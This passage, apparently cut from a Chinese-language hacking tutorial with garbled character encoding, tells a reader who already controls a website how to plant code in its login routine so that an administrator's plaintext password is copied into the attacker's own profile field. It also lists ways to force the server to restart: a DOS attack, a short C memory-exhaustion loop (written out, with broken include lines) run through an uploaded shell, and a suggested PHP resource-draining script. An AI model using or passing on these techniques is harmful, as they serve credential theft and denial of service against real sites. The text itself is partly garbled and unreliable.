)沒(méi)事讀源程序吧^_^），找到網(wǎng)站登錄的程序，加一段程序，可以根據ID來(lái)判斷是管理員，如果是把他的密碼（在如MD5加密前）插入到你的信箱或QQ等字段中，這樣你可以打開(kāi)你的用戶(hù)資料來(lái)看了??！接下來(lái)談?wù)勅绾谓蟹?wù)器重起：方法一、我非常建議用的方法哪就是DOS攻擊！方法二、如果你上傳的SHELL能執行命令！可以傳一個(gè)很簡(jiǎn)單的C程序，讓它不斷地MALLOC分配內存，而且不FREE。#include#includemain(){for(; ;) malloc(0xffffff);}方法三、如果一些網(wǎng)站是PHP的不能執行外部命令（我們上傳上去的可執行文件不能運行）！哪位高手編一個(gè)PHP程序耗掉它的資源！